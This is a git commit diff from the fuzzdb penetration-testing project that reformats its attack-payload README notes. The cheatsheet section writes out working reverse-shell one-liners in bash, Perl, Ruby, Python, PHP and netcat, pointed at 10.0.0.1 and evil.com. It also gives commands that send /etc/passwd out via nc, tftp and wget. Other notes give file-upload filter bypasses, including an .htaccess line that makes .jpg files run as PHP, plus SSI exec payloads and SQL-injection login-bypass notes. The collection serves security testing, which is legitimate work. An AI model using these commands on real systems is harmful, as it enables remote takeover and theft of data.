mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-10 05:24:12 +00:00
Merge branch 'master' of https://github.com/fuzzdb-project/fuzzdb
This commit is contained in:
commit
95e3f3d1ad
8 changed files with 159 additions and 130 deletions
|
@ -1,13 +1,17 @@
|
|||
Notes:
|
||||
|
||||
source-disc-cmd-exec-traversal.txt
|
||||
single directory traversals that have caused showcode or command exec issues in the past
|
||||
GET /path/*payload*relative/path/to/target/file/
|
||||
**source-disc-cmd-exec-traversal.txt**
|
||||
|
||||
single directory traversals that have caused showcode or command exec issues in the past
|
||||
|
||||
``` GET /path/*payload*relative/path/to/target/file/ ```
|
||||
|
||||
**source-disclosure-generic.txt**
|
||||
|
||||
source-disclosure-generic.txt
|
||||
known cross platform source Code, file disclosure attack patterns - append after file or dir path
|
||||
|
||||
source-disclosure-microsoft.txt
|
||||
**source-disclosure-microsoft.txt**
|
||||
|
||||
microsoft-specific - appends after filename - try the generic list for microsoft, too
|
||||
|
||||
|
||||
|
|
|
@ -1,74 +1,94 @@
|
|||
# File Upload Fuzzfiles- File Name Filter Bypass Notes
|
||||
File Upload Fuzzfiles- File Name Filter Bypass Notes
|
||||
|
||||
see: http://cwe.mitre.org/data/definitions/434.html
|
||||
|
||||
# kinds of file upload verifications:
|
||||
# content-type
|
||||
# filename extension verificationi (whitelist, blacklist)
|
||||
# file content checking
|
||||
# client side, ha ha ha
|
||||
* kinds of file upload verifications:
|
||||
* content-type
|
||||
* filename extension verificationi (whitelist, blacklist)
|
||||
* file content checking
|
||||
* client side, ha ha ha
|
||||
|
||||
File notes:
|
||||
|
||||
alt-extensions-asp.fuzz.txt
|
||||
alt-extensions-coldfusion.fuzz.txt
|
||||
alt-extensions-jsp.fuzz.txt
|
||||
alt-extensions-perl.fuzz.txt
|
||||
alt-extensions-php.fuzz.txt
|
||||
# Alternative ways of expressing file extensions that will be interpreted correctly by the target filesystem/app and can be used to bypass blacklist filters
|
||||
**alt-extensions-asp.fuzz.txt**
|
||||
|
||||
file-ul-filter-bypass-commonly-writable-directories.fuzz.txt
|
||||
# File directory names that experience has shown are often writable
|
||||
**alt-extensions-coldfusion.fuzz.txt**
|
||||
|
||||
file-ul-filter-bypass-microsoft-asp-filetype-bf.fuzz.txt
|
||||
# {ASPSCRIPT}gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
|
||||
**alt-extensions-jsp.fuzz.txt**
|
||||
|
||||
file-ul-filter-bypass-microsoft-asp.fuzz.txt
|
||||
# this file contains a number of common predictable values. Add more if other file types are allowed, or use the filetype-bf version of this fuzzfile - {ASPSCRIPT} gets regex replaced.
|
||||
**alt-extensions-perl.fuzz.txt**
|
||||
|
||||
file-ul-filter-bypass-ms-php.fuzz.txt
|
||||
file-ul-filter-bypass-x-platform-php.fuzz.txt
|
||||
# php on microsoft, cross-platform. use both on ms.
|
||||
# Use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
|
||||
# -----
|
||||
#<?php phpinfo(); ?>
|
||||
#-----
|
||||
# then regex replace {PHPSCRIPT} with the name of your .jpg file in the target directory
|
||||
**alt-extensions-php.fuzz.txt**
|
||||
|
||||
Alternative ways of expressing file extensions that will be interpreted correctly by the target filesystem/app and can be used to bypass blacklist filters
|
||||
|
||||
|
||||
invalid-filenames-microsoft.fuzz.txt
|
||||
# Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
|
||||
# regex replace {EXT} with allowed extension type
|
||||
**file-ul-filter-bypass-commonly-writable-directories.fuzz.txt**
|
||||
|
||||
file-ul-filter-bypass-x-platform-generic.fuzz.txt
|
||||
# These might bypass a file upload blacklist but be written in a way that leaves them executable because of the filetype
|
||||
# regex replace {PHPSCRIPT} with your script name
|
||||
File directory names that experience has shown are often writable
|
||||
|
||||
|
||||
invalid-filenames-linux.fuzz.txt
|
||||
# invalid filenames under linux, and since there aren't too many of those, other filepaths that may cause problems. # these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
|
||||
**file-ul-filter-bypass-microsoft-asp-filetype-bf.fuzz.txt**
|
||||
|
||||
``` {ASPSCRIPT} ``` gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
|
||||
|
||||
|
||||
invalid-filesystem-chars-microsoft.fuzz.txt
|
||||
# list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
|
||||
# fuzz these into a filename during upload attempts
|
||||
**file-ul-filter-bypass-microsoft-asp.fuzz.txt**
|
||||
|
||||
this file contains a number of common predictable values. Add more if other file types are allowed, or use the filetype-bf version of this fuzzfile - ``` {ASPSCRIPT} ``` gets regex replaced.
|
||||
|
||||
|
||||
**file-ul-filter-bypass-ms-php.fuzz.txt**
|
||||
|
||||
## Addtl Tips:
|
||||
**file-ul-filter-bypass-x-platform-php.fuzz.txt**
|
||||
|
||||
# For mod_cgi Server Side Include upload attacks:
|
||||
<!--#exec cmd="ls" -->
|
||||
php on microsoft, cross-platform. use both on ms.
|
||||
|
||||
# or, on Windows
|
||||
Use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:
|
||||
|
||||
<!--#exec cmd="dir" -->
|
||||
``` <?php phpinfo(); ?> ```
|
||||
|
||||
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
|
||||
# try setting jpg mimetype handler to executable. If you can set the target directory, try to fuzz the
|
||||
# list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
|
||||
then regex replace ``` {PHPSCRIPT} ``` in the fuzzfile payload with the name of your .jpg file in the target directory
|
||||
|
||||
|
||||
**invalid-filenames-microsoft.fuzz.txt**
|
||||
|
||||
Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files
|
||||
|
||||
regex replace ``` {EXT} ``` with allowed extension type
|
||||
|
||||
|
||||
**file-ul-filter-bypass-x-platform-generic.fuzz.txt**
|
||||
|
||||
These might bypass a file upload blacklist but be written in a way that leaves them executable because of the filetype
|
||||
regex replace ``` {PHPSCRIPT} ``` with your script name
|
||||
|
||||
|
||||
**invalid-filenames-linux.fuzz.txt**
|
||||
|
||||
invalid filenames under linux, and since there aren't too many of those (there's one), other filepaths that may cause problems. these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
|
||||
|
||||
|
||||
**invalid-filesystem-chars-microsoft.fuzz.txt**
|
||||
|
||||
list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. fuzz these into a filename during upload attempts
|
||||
|
||||
|
||||
**Addtl Tips:**
|
||||
|
||||
**For mod_cgi Server Side Include upload attacks:**
|
||||
|
||||
``` <!--#exec cmd="ls" --> ```
|
||||
|
||||
or, on Windows
|
||||
|
||||
``` <!--#exec cmd="dir" --> ```
|
||||
|
||||
Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
|
||||
try setting jpg mimetype handler to executable. If you can set the target directory, try to fuzz the
|
||||
list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
|
||||
|
||||
** example .htaccess entry that sets mime type .jpg to be executable:**
|
||||
|
||||
``` AddType application/x-httpd-php .jpg ```
|
||||
|
||||
# example .htaccess entry that sets mime type .jpg to be executable:
|
||||
-----
|
||||
AddType application/x-httpd-php .jpg
|
||||
-----
|
||||
|
|
|
@ -1,93 +1,90 @@
|
|||
Remote Command Exec Cheatsheet
|
||||
|
||||
File notes:
|
||||
File notes
|
||||
|
||||
source-disc-cmd-exec-traversal.fuzz.txt
|
||||
# single directory traversals that have caused showcode or command exec issues in the past
|
||||
# GET /path/*payload*relative/path/to/target/file/
|
||||
**source-disc-cmd-exec-traversal.fuzz.txt**
|
||||
|
||||
usage
|
||||
```GET /path/*payload*relative/path/to/target/file/```
|
||||
|
||||
Executing Commands
|
||||
**Executing Commands**
|
||||
|
||||
Seperating Commands:
|
||||
blah;blah2
|
||||
Seperating Commands
|
||||
``` blah;blah2 ```
|
||||
|
||||
PIPEZ:
|
||||
blah ^ blah2
|
||||
PIPES
|
||||
``` blah ^ blah 2```
|
||||
|
||||
AND:
|
||||
blah && blah2
|
||||
AND
|
||||
```blah && blah2```
|
||||
|
||||
OR:
|
||||
FAIL || X
|
||||
OR
|
||||
```FAIL || X```
|
||||
|
||||
OR:
|
||||
blah%0Dblah2%0Dblah3
|
||||
OR
|
||||
``` blah%0Dblah2%0Dblah3 ```
|
||||
|
||||
Backtick:
|
||||
`blah`
|
||||
Backtick
|
||||
``` `blah` ```
|
||||
|
||||
Background:
|
||||
`blah & blah2`
|
||||
Background
|
||||
``` `blah & blah2` ```
|
||||
|
||||
**Exfiltrating Files / Data**
|
||||
|
||||
|
||||
Exfiltrating Files / Data
|
||||
|
||||
FTP:
|
||||
FTP
|
||||
Make a new text file, and echo and then redirect to FTP
|
||||
|
||||
NC:
|
||||
nc -e /bin/sh
|
||||
NC
|
||||
``` 'nc -e /bin/sh' ```
|
||||
|
||||
NC:
|
||||
echo /etc/passwd | nc host port
|
||||
NC
|
||||
``` 'echo /etc/passwd | nc host port' ```
|
||||
|
||||
TFTP:
|
||||
echo put /etc/passwd | tftp host
|
||||
TFTP
|
||||
``` 'echo put /etc/passwd | tftp host' ```
|
||||
|
||||
WGET:
|
||||
wget --post-file /etc/passwd
|
||||
``` 'wget --post-file /etc/passwd' ```
|
||||
|
||||
**One-Liner Reverse Shells**
|
||||
|
||||
|
||||
One-Liner Reverse Shells
|
||||
|
||||
|
||||
On the listener:
|
||||
$ nc -l -p 8080 -vvv
|
||||
On the listener
|
||||
``` $ nc -l -p 8080 -vvv' ```
|
||||
|
||||
On the remote host...
|
||||
Bash:
|
||||
$ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
|
||||
``` $ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ```
|
||||
|
||||
$ exec 5<>/dev/tcp/evil.com/8080
|
||||
$ cat <&5 | while read line; do $line 2>&5 >&5; done
|
||||
``` $ exec 5<>/dev/tcp/evil.com/8080 ```
|
||||
'$ cat <&5 | while read line; do $line 2>&5 >&5; done'
|
||||
|
||||
Perl:
|
||||
$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
Perl
|
||||
```$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ```
|
||||
|
||||
Ruby:
|
||||
$ ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
||||
Ruby
|
||||
``` $ ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ```
|
||||
|
||||
Python:
|
||||
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||||
Python
|
||||
``` $ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ```
|
||||
|
||||
PHP:
|
||||
$ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
PHP
|
||||
``` $ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ```
|
||||
(Assumes TCP uses file descriptor 3. It it doesn't work, try 4,5, or 6)
|
||||
|
||||
Netcat:
|
||||
$ nc -e /bin/sh 10.0.0.1 1234
|
||||
Netcat
|
||||
``` $ nc -e /bin/sh 10.0.0.1 1234 ```
|
||||
|
||||
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
|
||||
``` $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f ```
|
||||
|
||||
```
|
||||
XTERM:
|
||||
Server:
|
||||
$ xterm -display 10.0.0.1:1
|
||||
Listener:
|
||||
$ Xnest :1
|
||||
$ xhost +targetip
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,5 @@
|
|||
|
||||
traversals-8-deep-exotic-encoding.fuzz.txt
|
||||
# Use Regex to replace {FILE} with your target filename
|
||||
**traversals-8-deep-exotic-encoding.fuzz.txt**
|
||||
|
||||
Use Regex to replace {FILE} with your target filename
|
||||
|
||||
|
|
|
@ -1,12 +1,18 @@
|
|||
rfi.fuzz.txt
|
||||
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
|
||||
# Change XXpathXX to the path of your backdoor. Note that you may need to
|
||||
# try it against every directory on the target and because of how this was
|
||||
# culled you may need to add a question mark to your own XXpathXX URL:
|
||||
# Eg: XXpathXX => http://www.example.com/hax.txt?
|
||||
|
||||
Remote File Include scanning
|
||||
|
||||
Compiled by RSnake 02/01/2010
|
||||
|
||||
Mostly from milw0rm osvdb.org and elsewhere
|
||||
|
||||
Change XXpathXX to the path of your backdoor.
|
||||
Note that you may need to try it against every directory on the target and because of how this was culled you may need to add a question mark to your own XXpathXX URL:
|
||||
|
||||
XXpathXX => http://www.example.com/hax.txt?
|
||||
|
||||
see fuzzdb docs:
|
||||
|
||||
see:
|
||||
/docs/attack-docs/rfi-cheatsheet.html
|
||||
|
||||
Other tools:
|
||||
|
|
|
@ -1,6 +1,7 @@
|
|||
|
||||
MSSQL.fuzz.txt
|
||||
# you will need to customize/modify some of the vaules in the queries for best effect
|
||||
**MSSQL.fuzz.txt**
|
||||
|
||||
you will need to customize/modify some of the vaules in the payload queries for best effect
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -1,18 +1,18 @@
|
|||
|
||||
various useful post-exploitation commands
|
||||
|
||||
ms-sql-enumeration.fuzz.txt
|
||||
# ms-sqli info disclosure payload fuzzfile
|
||||
# replace regex with your fuzzer for best results <attackerip> <sharename>
|
||||
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
|
||||
# might need to terminate payloads with ;--
|
||||
**ms-sql-enumeration.fuzz.txt**
|
||||
* ms-sqli info disclosure payload fuzzfile
|
||||
* replace regex with your fuzzer for best results <attackerip> <sharename>
|
||||
* run wireshark or tcpdump, look for incoming smb or icmp packets from victim
|
||||
* might need to terminate payloads with ;--
|
||||
|
||||
|
||||
mysql-injection-login-bypass.fuzz.txt
|
||||
# regex replace as many as you can with your fuzzer for best results:
|
||||
# <user-fieldname> <pass-fieldname> <username>
|
||||
# also try to brute force a list of possible usernames, including possile admin acct names
|
||||
**mysql-injection-login-bypass.fuzz.txt**
|
||||
* regex replace as many as you can with your fuzzer for best results:
|
||||
* <user-fieldname> <pass-fieldname> <username>
|
||||
* also try to brute force a list of possible usernames, including possile admin acct names
|
||||
|
||||
mysql-read-local-files.fuzz.txt
|
||||
# mysql local file disclosure through sqli
|
||||
# fuzz interesting absolute filepath/filename into <filepath>
|
||||
**mysql-read-local-files.fuzz.txt**
|
||||
* mysql local file disclosure through sqli
|
||||
* fuzz interesting absolute filepath/filename into <filepath>
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
# some files generated with cms-explorer
|
||||
http://code.google.com/p/cms-explorer/
|
||||
use these for q&d but cms explorer does a lot more
|
||||
**CMS files generated with cms-explorer** http://code.google.com/p/cms-explorer/
|
||||
use the provided lists for q&d but cms explorer does a lot more.
|
||||
|
||||
# wordpress.fuzz.txt generating by cat >>, sort, uniq of multiple versions of wordpress for wordpress into one fuzzfile, for maximum detection in full effect, yo
|
||||
**wordpress.fuzz.txt**
|
||||
generated by bringing the filenames from each incremental new version of wordpress into one fuzzfile
|
||||
|
|
Loading…
Reference in a new issue